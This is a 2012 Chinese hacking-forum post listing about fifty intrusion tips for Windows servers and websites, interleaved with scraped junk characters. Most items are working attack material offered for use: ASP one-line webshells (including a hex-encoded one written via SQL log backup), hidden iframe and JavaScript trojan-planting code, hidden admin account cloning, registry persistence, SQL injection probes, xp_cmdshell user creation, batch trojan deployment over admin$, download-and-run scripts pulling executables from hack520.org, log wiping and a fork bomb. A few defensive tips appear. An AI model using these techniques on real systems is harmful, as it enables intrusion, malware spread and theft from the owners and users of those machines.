找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2290|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
* I' r( w/ \" l  H) r9 Ucacls C:\windows\system32 /G hqw20:R
# ^$ A6 \4 F7 l* m! Z思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入; k7 H1 u1 [! C" U5 |
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F* k: c# r: f. k: B: n  Z! ?% n
) v( \; b3 y6 P8 r" ?
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。9 e  V) P  w& ~

3 X/ E5 \* v3 `2 ]" `3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
+ L% H: H  K* m
7 f3 q4 y. K  j, O8 L% r4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
2 X# ~5 a) ?! h/ x* y6 ~: K+ d5 Z, A2 d. H
5、利用INF文件来修改注册表
6 s+ R/ U* L1 D. a: Z* G[Version]
; l8 k5 N) {( v) ]2 VSignature="$CHICAGO$"
, ?" _5 Z, B/ O* h6 `# o[Defaultinstall]
1 `+ p9 h- r# f; R1 P+ j! AaddREG=Ating, f) g6 u& x3 K" b9 D  _5 o
[Ating]
8 q2 b0 x) Y9 M% mHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"+ f0 L) S* h) R2 [
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
6 J/ M+ m. z8 O, y; R# M5 }/ rrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
6 ^1 M5 o& J! _8 Q其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU+ R: K' L6 Z/ [' l0 l0 M; d; t
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU$ K" f3 P2 @( ?) ~, K
HKEY_CURRENT_CONFIG 简写为 HKCC/ M: r( r, Z' N0 E/ w7 c8 u3 F( e  r
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值# `! F) c- f8 ?' ]& K
"1"这里代表是写入或删除注册表键值中的具体数据
4 f4 l# D% ^! [8 Q( a7 @5 Q: T& W' B$ J) b2 M# \
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,+ |9 l- w2 O4 F6 Q7 d0 a3 d8 V
多了一步就是在防火墙里添加个端口,然后导出其键值* N3 O' T' F9 d: A
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
- _# w( s% [7 y8 ]$ v, p; \4 e) o- N# D/ B. \
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
: |  t+ A7 O1 v; @) ?4 u' c* w" u在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。( }5 }; Z( u6 E8 \$ N' |
7 T/ x: H+ Y. d2 k( m: _$ T: O
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。0 V- o( ]  M% z. [
( n' s9 b; z. j( X$ N" F0 p8 G% \$ i* S
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,; u# M) F% i8 y
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
; |8 {5 d( X" L* F( L# U+ _! |4 u- p4 {2 h1 I5 i2 k8 a  _
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”  f, P7 _( j& p$ q5 p/ r
7 ~4 Q2 u; Y( j+ }4 e/ ^# [% ~: X
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,% ?6 z1 z) v9 [1 v& q
用法:xsniff –pass –hide –log pass.txt
  p. [4 V. }8 M/ G3 N' R
, [( ?& U8 Z; @: g; R$ U- A' }12、google搜索的艺术& S2 z% j( h0 ~& @; n% K. Y% y
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”% t0 q, i: G, ]
或“字符串的语法错误”可以找到很多sql注入漏洞。$ ~% f0 q. s7 b

$ @8 U" ]1 W1 j+ K13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
, @( O8 H! ~2 f5 G
. b- o- b% A2 }: U- R' N14、cmd中输入 nc –vv –l –p 19879 m+ P8 j3 T* s9 e0 a! N) V
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
. K0 r! h6 M2 c% D- H& f6 x. Z0 X1 ^* k2 O+ O
15、制作T++木马,先写个ating.hta文件,内容为
# r: K' z8 B& m) ?. r+ }* a<script language="VBScript">0 A5 W- w" L; U# [! u0 y2 t4 g
set wshshell=createobject ("wscript.shell" )$ E' c: s3 ^, H- h  t
a=wshshell.run("你马的名称",1)0 O1 Y# W# W$ H  r
window.close
. _% ^/ _4 T7 a" B, `</script>
; d* O" e7 }. a; i  U7 a5 f, e再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。5 ]7 b- @( f2 Q/ q; r1 e
- v- {& d3 V+ z- e8 l0 p
16、搜索栏里输入2 ~9 r* f2 I( h7 k  {
关键字%'and 1=1 and '%'='( J8 z) @# b/ I4 U
关键字%'and 1=2 and '%'='% a: ^1 ]& h8 l+ O
比较不同处 可以作为注入的特征字符
. Z# l- ^& o- H/ y( K" `! c" P$ J) ?. e' y' j8 f1 b* a! z
17、挂马代码<html>2 n1 o( V' N+ N$ B8 d% R' j
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>! }  r) \) ?" w0 N( n
</html>$ K' W0 f! Z4 v' L$ Y5 O

6 Z* g' k8 [& n18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,# ^2 p, i+ J( y
net localgroup administrators还是可以看出Guest是管理员来。
8 v8 j1 {" P5 r: B
5 \& R# B, u  C6 l19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等( k' T5 z1 }& ~/ y/ }5 P0 i5 j% Y* E
用法: 安装: instsrv.exe 服务名称 路径
$ d" o# [: C/ I0 u  Y3 e卸载: instsrv.exe 服务名称 REMOVE2 |& j# I8 X1 M' g  y/ L8 N8 ~

/ S$ |+ I4 L& H
( N& B( i6 s6 U4 Y  e" f; h6 F21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉; \8 ]3 h( W9 w% I! w5 R0 d
不能注入时要第一时间想到%5c暴库。. z2 \; M& g6 {% g( b: T
; E8 q( X. e5 `7 G; m# C
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
4 _/ M; G1 r3 Z
% R* j5 c0 q4 ?% _; y23、缺少xp_cmdshell时
, S$ v, G9 O$ Z. ?尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'1 C! x9 D8 {+ A1 E' z
假如恢复不成功,可以尝试直接加用户(针对开3389的)
$ J- U9 y6 {" D2 x) I8 T& e  g. s1 M, Zdeclare @o int5 K; A0 ~" z; `6 @1 E
exec sp_oacreate 'wscript.shell',@o out5 y, ?$ L& S5 c) d+ L0 p& V  `
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员9 T) ^( C% a/ }& E" \8 z) U0 Z1 c
5 ^. ^2 D5 o, G1 V: }9 `8 C6 u
24.批量种植木马.bat0 ^! M3 S: W( y
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中) y3 D1 E0 ~) _" U% `( F
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间" \  R! ~8 F$ h  y$ [+ n
扫描地址.txt里每个主机名一行 用\\开头3 o# o: W2 D, _
4 G; _$ G9 N6 A; Q* Z- j
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
$ X) b2 |2 p& T9 Y5 f3 t/ p
* Q9 X- W$ b; ^. G) p- B% O3 t26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.9 H9 ^8 P8 t7 m: O- _# n; F- `* n' Q
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
; v( i3 P2 X4 D. V.cer 等后缀的文件夹下都可以运行任何后缀的asp木马/ Z9 M( p" K6 q/ ^
8 q4 U6 d% R1 ?
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
6 `) \% w8 r/ {+ F6 q9 R然后用#clear logg和#clear line vty *删除日志
6 d2 ?, \4 D+ y. J+ |  ~6 q- E- |0 Z7 F9 p: T! M2 e
28、电脑坏了省去重新安装系统的方法
. D0 ]* ?! W9 W  t& K) T2 O纯dos下执行,
' j$ t- {, l0 ]4 }4 Y! O$ g; Txp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
' g1 {$ }) U2 N: @2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config' M, n; _; ?3 w8 ?
! K4 ]7 j$ ~" I
29、解决TCP/IP筛选 在注册表里有三处,分别是:
" Y4 D% Z4 t  @HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip- X3 z  \9 b' x# f
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip4 W. |8 t7 @' T  ~# E7 O/ l7 y
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
  Y, y: }" @6 |7 ]分别用7 N, g9 m% ?2 _# e( v' ~
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip9 f- O3 r& O* a
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
; ~+ [3 T) ]$ s4 U1 dregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
* A$ y! F$ O" V命令来导出注册表项
; O5 b) \# D# X4 y& Y  O( M然后把三个文件里的EnableSecurityFilters"=dword:00000001,$ R) l% v  V% @* }* a
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
& W' L. b7 c0 s  A$ r7 ]regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
9 G4 }& M) O, N2 a1 j/ i0 K1 Y& L/ X! o. X
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
1 C% h3 ?3 i$ ?' F: L: eSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的31 w$ w& d% ~# Z, Z
$ r& G3 R; d. Q
31、全手工打造开3389工具
! v' n" K' G2 S9 A) C% e打开记事本,编辑内容如下:
1 L9 m6 X/ Y$ W7 C& Mecho [Components] > c:\sql/ M* v* j3 G7 c6 V
echo TSEnable = on >> c:\sql
5 [7 v1 a8 v- ?3 X& f7 F% Tsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
9 r1 q, Z/ }. M7 n$ K. h7 }. o9 o编辑好后存为BAT文件,上传至肉鸡,执行6 P5 b# v# J, a+ A" }1 z' p
6 O3 C" Y: S  Y* s7 k- v4 w
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
( ], I, t4 s( P) I8 u/ k' h3 o
6 U9 y7 X& G8 D5 X7 V33、让服务器重启
( j2 X' F$ L2 o# O- N. O+ p1 d写个bat死循环:
2 V0 g, H2 e  `( J5 N! w9 H) P@echo off
( {2 r6 y+ A# j9 C:loop1
1 A- I! [0 J1 `$ W' W8 I* A8 Rcls
9 s2 u' n; O! J% B5 Zstart cmd.exe
3 l" x% `6 c2 k# e) x* J# [, Vgoto loop1
( P0 \4 J7 U" O& q- c3 S保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启: y+ r2 v' `4 _- J

( h3 m4 P5 A' v: q34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
. K5 Y- u& [5 M@echo off
/ Z- j/ v* ^9 q5 odate /t >c:/3389.txt
# z  Q; n, F1 Mtime /t >>c:/3389.txt
' r; S5 B5 w6 j) Z4 [attrib +s +h c:/3389.bat
$ r! i' U2 s& E5 Q& e4 ]2 Q2 Iattrib +s +h c:/3389.txt
7 a, i/ k& b; K: Q# o6 I% xnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt$ q: t6 n" h( b4 s
并保存为3389.bat/ D2 S1 k; Q0 `
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
9 r+ }- D$ `$ C; v! m" \/ |$ K/ p: T; x* V* m: l1 Y
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
2 v, j! I( Y. H3 _1 Istart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页), Z% T9 U8 y3 n# [( B1 W
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
  e1 [) w+ G; L; r& B+ C" l. L8 U' ~6 d( k
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件% d" z3 Y, ?" o. N1 H
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址( ~( }) z2 C9 V# I% O, G- e4 T
echo 你的FTP账号 >>c:\1.bat //输入账号
( V& T# P: ^: h3 ?0 S* oecho 你的FTP密码 >>c:\1.bat //输入密码
- x% Q- y  n7 _echo bin >>c:\1.bat //登入: \% T/ v5 o; j0 y
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
6 F7 K' O+ l9 b7 D5 m+ j3 A+ T  [: jecho bye >>c:\1.bat //退出5 b0 s  T! t( T: M6 [
然后执行ftp -s:c:\1.bat即可; _$ @* D! j$ F% X& U: [  {8 X
# l* J4 i" U) C9 V
37、修改注册表开3389两法& [" ?+ I7 w- u$ y) x: d0 _5 q- Y
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
2 n7 ~: v) s6 y$ y/ w2 `/ Gecho Windows Registry Editor Version 5.00 >>3389.reg
) I% q9 Z( r' ]+ g/ J( u0 l' hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg3 n& M" c9 M; H9 [
echo "Enabled"="0" >>3389.reg/ |" D9 ~% J- J" w0 @* V) Z
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows# y! {* ^+ _* l% E: H+ X2 k/ N1 K
NT\CurrentVersion\Winlogon] >>3389.reg
/ N( A' O# F9 jecho "ShutdownWithoutLogon"="0" >>3389.reg0 r' @6 T# |% Z% J
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
6 d  F- Q2 d% g- O1 D0 Y>>3389.reg
( g/ {& W9 ?$ {2 r* Gecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
7 U4 X) y5 i6 A& x9 ~  Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]3 a* c6 O$ ~2 k: @. z6 V3 V
>>3389.reg
/ C8 l1 }2 Y3 s0 C% `echo "TSEnabled"=dword:00000001 >>3389.reg& u1 O% G* P! c1 K5 }* ?' [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
- J$ m4 H- O5 V2 q8 [" Y, n. @6 yecho "Start"=dword:00000002 >>3389.reg1 ^3 l( |: k. W" x4 F) S) |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]* l$ ?4 G2 {6 [: q
>>3389.reg
! P4 P  ?( o6 l9 p  s7 e/ h7 wecho "Start"=dword:00000002 >>3389.reg, Q6 T7 [8 B- ?2 W8 q- }8 X& v
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
7 X4 U1 q% ?# t2 J  ?& m( J* B3 Vecho "Hotkey"="1" >>3389.reg* D" H7 S, D4 F0 j3 T* D' D( u& C
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal# o# r8 s1 T; S8 x6 {! ~
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
& e8 H7 Z. @+ L' G) `echo "PortNumber"=dword:00000D3D >>3389.reg$ u: {; N% p- I8 j$ ~& E" X6 E
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" V/ ^$ a, y( r& TServer\WinStations\RDP-Tcp] >>3389.reg- P0 F  s+ B) w# m% c1 f  d4 }/ \
echo "PortNumber"=dword:00000D3D >>3389.reg: k& H. |5 N% |$ r; s
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
+ S" m) N1 I$ S) t8 Q(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
' D. b6 j0 X, p4 Z6 _; y因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效2 y6 [. Z8 P8 v. p3 V. o; k
(2)winxp和win2003终端开启
" h: s# [, C" W4 v& o: b+ _+ g用以下ECHO代码写一个REG文件:5 L$ `0 E  I7 _, N
echo Windows Registry Editor Version 5.00>>3389.reg3 l( m0 H& f0 m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 ~0 }( p2 c" N& Q7 L+ i
Server]>>3389.reg" g  T' u& u5 I0 C3 P
echo "fDenyTSConnections"=dword:00000000>>3389.reg1 b) f  O- o- i; y6 I* s
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) }4 b* `" l' M/ x& _
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
$ Q$ g6 ?5 w, k1 V' Decho "PortNumber"=dword:00000d3d>>3389.reg
: t; ~- P7 b! _7 R( necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
) J, J" V: N% ?. S4 d, HServer\WinStations\RDP-Tcp]>>3389.reg
2 X8 M: d! F" c) i; techo "PortNumber"=dword:00000d3d>>3389.reg
' V, X: \% d5 }0 t" v* i然后regedit /s 3389.reg del 3389.reg3 {0 J. }" t" {: Y
XP下不论开终端还是改终端端口都不需重启1 [5 X$ K" v3 U# M2 w" B, D4 s5 @

. u; M9 }# W( }1 w8 h38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
2 o  n% W2 S- v! l: v7 e用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'5 q1 g# f7 v4 U. {, W0 A( J* c- f

9 h" e/ }. Z7 _2 U4 ?& ?; t# h9 H9 e39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!( s0 V; \" a9 n1 Q+ h
(1)数据库文件名应复杂并要有特殊字符( S2 Y6 n3 G0 h0 e
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源. v1 m; n; \% |& C, S
将conn.asp文档中的. {; N0 r, R6 |, P2 I
DBPath = Server.MapPath("数据库.mdb")
" |; `6 N# `) P9 ?conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
! i. d( k2 q5 w) z: c3 ?
" n' A* {8 V% ~- F$ z修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
  r8 Z- @- `* j8 d; {+ f% i# Q" C(3)不放在WEB目录里! P7 [! a! U2 B1 g( H
$ G% I" t. u$ x4 R3 u- U9 s
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉/ a. U2 C5 V1 b
可以写两个bat文件" ]3 T6 J2 w2 z+ C
@echo off
, y0 E7 P& }& W" o. o@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe- U: R( Z3 M7 ^: Y: [' L
@del c:\winnt\system32\query.exe
3 e" D4 h( J. x, N. D! k! ^3 C: Q@del %SYSTEMROOT%\system32\dllcache\query.exe
& \: ~0 d5 P' G! C8 x@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的. @# _5 s2 _* q; G/ m" S

& ~+ k3 a6 |2 _/ q* `) w" h7 i4 B@echo off. T5 p1 {& b: z8 e# \! t  z
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe  d2 Y4 Q9 n9 u- ]% M- a+ D; i
@del c:\winnt\system32\tsadmin.exe( y  F, |. Y/ p: y& D+ S) i9 m
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex$ U* u2 t9 z$ W& }0 E5 S1 K
4 K$ X( S' W; N
41、映射对方盘符
' b  d6 \  B5 Y( W! K6 gtelnet到他的机器上,
4 f" G- u$ c7 i" c+ Enet share 查看有没有默认共享 如果没有,那么就接着运行) C% p; O: A- c( U, @
net share c$=c:  o* r2 _! N0 w$ e1 e
net share现在有c$
" S' J7 F' Y/ e/ e3 G% D' N* \0 P在自己的机器上运行
1 w; f! n3 G' q: rnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K2 M& C% i- P' h/ d
7 w4 ]; J3 b! _( o0 O- V/ }3 u* v
42、一些很有用的老知识
6 [. i& o- ]. _7 mtype c:\boot.ini ( 查看系统版本 )' q) ]) c& t& E9 ?0 j9 O2 T0 A" V
net start (查看已经启动的服务)2 |/ a" }& ]) Q1 |" X
query user ( 查看当前终端连接 )
% d$ G/ @9 R1 m0 cnet user ( 查看当前用户 )) _) r/ Q; p3 G4 C
net user 用户 密码/add ( 建立账号 ): T0 ^" f- S5 K
net localgroup administrators 用户 /add (提升某用户为管理员)( B5 t: l% L3 T) e; B  D3 T
ipconfig -all ( 查看IP什么的 )
; m" b/ F. G- L1 ?4 Unetstat -an ( 查看当前网络状态 ): @1 ~6 B3 N) k) A6 o. o; G( F
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
0 e/ A$ a# b' N4 b& Z7 p5 @克隆时Administrator对应1F4
- S; c$ U6 _0 w9 dguest对应1F5
/ k: @- }7 o7 S6 i7 vtsinternetuser对应3E8
) F+ }' _$ ?: Y+ h0 U, r
: }9 w  y) w% O& A2 h4 z6 r43、如果对方没开3389,但是装了Remote Administrator Service
6 w2 u- Q0 \. d: A& \( F用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接1 f/ w! ]/ B, q9 g  Z$ I
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息" U9 _4 N' H3 V! {7 q
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
' K: _7 L0 u' B% Y, D) C
& g* Z. X; q+ t) j) V* \* G4 |44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定); ~! w: f: L  O8 M4 @) P. y
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
+ M! O: k9 m+ y/ O& N, L
) R! V5 i& z2 a$ S0 o45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
5 f7 i- d; `1 K8 ]; k- k2 E2 ~& e( mecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
* M9 R3 v! y; r8 l3 x/ `* Y# G5 m^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
& b5 y) |. U/ `CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =& P% c- p$ z3 E' z  L/ M
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
1 D* T" ?; X% L(这是完整的一句话,其中没有换行符)
8 d; w: O" k2 ^- ?2 U; d/ {6 |' a然后下载:1 I; q+ N) o  t( ?+ j
cscript down.vbs http://www.hack520.org/hack.exe hack.exe; `3 v) O% U; R& v/ j3 J

  w7 R$ E5 Z3 n5 O& S2 W, b46、一句话木马成功依赖于两个条件:; ]0 Z6 n' F' y3 G2 {; n
1、服务端没有禁止adodb.Stream或FSO组件
8 T, U$ u# r3 f3 l5 v; f% d2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。. j0 E  {$ N* x5 A( @( ~
# f+ t2 z( N% H0 _4 F' X3 u2 Z# s( B
47、利用DB_OWNER权限进行手工备份一句话木马的代码:# A* f, a# o1 T# z# t% s0 X) L
;alter database utsz set RECOVERY FULL--
. @; ~! {3 r* E2 Z+ b% X;create table cmd (a image)--+ A* x6 S% |0 z# `: Y( V9 O/ w
;backup log utsz to disk = 'D:\cmd' with init--
6 ^/ g+ ]+ R- z  P. t+ c+ v4 \;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
3 ]% B  ?- W2 E  n' ];backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
3 R: l& H8 W' }注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。8 O6 g* v) c) t# X4 e6 N4 h/ F
7 c! D/ X# w* `
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
$ |" \8 K  H- U2 r7 }: C( z- ~7 F9 w1 `7 R9 X8 a  W
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
6 a- ]9 Y; A7 I" H6 j; l: Y9 S所有会话用 'all'。: s& ]. c: l, X% f6 N4 O
-s sessionid 列出会话的信息。9 b$ B7 ]6 c+ w, ^. q
-k sessionid 终止会话。8 S6 {. Y( _& N
-m sessionid 发送消息到会话。/ s; e9 A! a7 W/ V  g* |1 L1 U5 b
. `' e9 R$ T. ^8 R0 J
config 配置 telnet 服务器参数。; Y3 |1 A8 m( G4 y7 n9 Z) }

; p: I8 s. I' _% U/ L, Ecommon_options 为:' i$ Q/ K: `+ c6 Q2 I- b
-u user 指定要使用其凭据的用户6 [: I. E* O0 ?2 p$ @
-p password 用户密码3 K( X2 `2 C. f1 @1 H5 o

6 o: t" K9 @0 g: \$ M" B8 oconfig_options 为:1 o- @) ?( @( ^& s3 C4 c
dom = domain 设定用户的默认域
4 `. `0 J& C6 a4 c! Dctrlakeymap = yes|no 设定 ALT 键的映射" H' ^, i: J3 d: K
timeout = hh:mm:ss 设定空闲会话超时值
/ o3 C- H# F: f8 ~timeoutactive = yes|no 启用空闲会话。% P2 e7 D5 x5 W- R
maxfail = attempts 设定断开前失败的登录企图数。: E$ O- |% h1 |$ \
maxconn = connections 设定最大连接数。
; m% K/ p4 S* j" lport = number 设定 telnet 端口。& j& U9 W. ^' c$ Y, j0 ]. F  T
sec = [+/-]NTLM [+/-]passwd
* b1 X( T+ P3 ~8 w  k9 v设定身份验证机构# [+ {5 q3 |$ R" f
fname = file 指定审计文件名。4 R  C9 J* J) \0 x* ^1 N
fsize = size 指定审计文件的最大尺寸(MB)。! w! X! N- ^! P* ^' s
mode = console|stream 指定操作模式。, B  a7 x+ a  z6 O" N, {3 {: G
auditlocation = eventlog|file|both
1 I' \2 d: h/ V2 {3 r指定记录地点, n; j2 ?( ?$ ?. R4 v* S4 Y
audit = [+/-]user [+/-]fail [+/-]admin2 i% x( B& |- n0 M

! f$ e- I9 I. e+ W) D2 `& D' k6 I49、例如:在IE上访问:
. h6 U% A/ T) \1 G2 j+ K- Zwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
; E7 R0 |4 s) G, f' o/ yhack.txt里面的代码是:0 H& N6 t  O4 U8 L8 b
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">3 v5 z. p  x6 J5 R
把这个hack.txt发到你空间就可以了!
# q7 O3 S0 U: q; Z这个可以利用来做网马哦!2 {/ R( M1 ]" A8 r' D
' q% r# r: Q) s; A# @6 X" Y! G
50、autorun的病毒可以通过手动限制!
+ r2 K! Z% O& K1 W- U0 V1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
# Z6 S' a8 @/ e! _  H. N2,打开盘符用右键打开!切忌双击盘符~
0 r9 }7 m1 _+ H' s( s5 b6 w2 H3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!, ~/ w; t" f8 i0 {1 p
! J% u% h5 b. n% U3 s0 u
51、log备份时的一句话木马:
. h2 P0 J5 n4 m$ b0 k8 j. _a).<%%25Execute(request("go"))%%25>9 _$ {! ]$ F- C, Q3 [
b).<%Execute(request("go"))%>
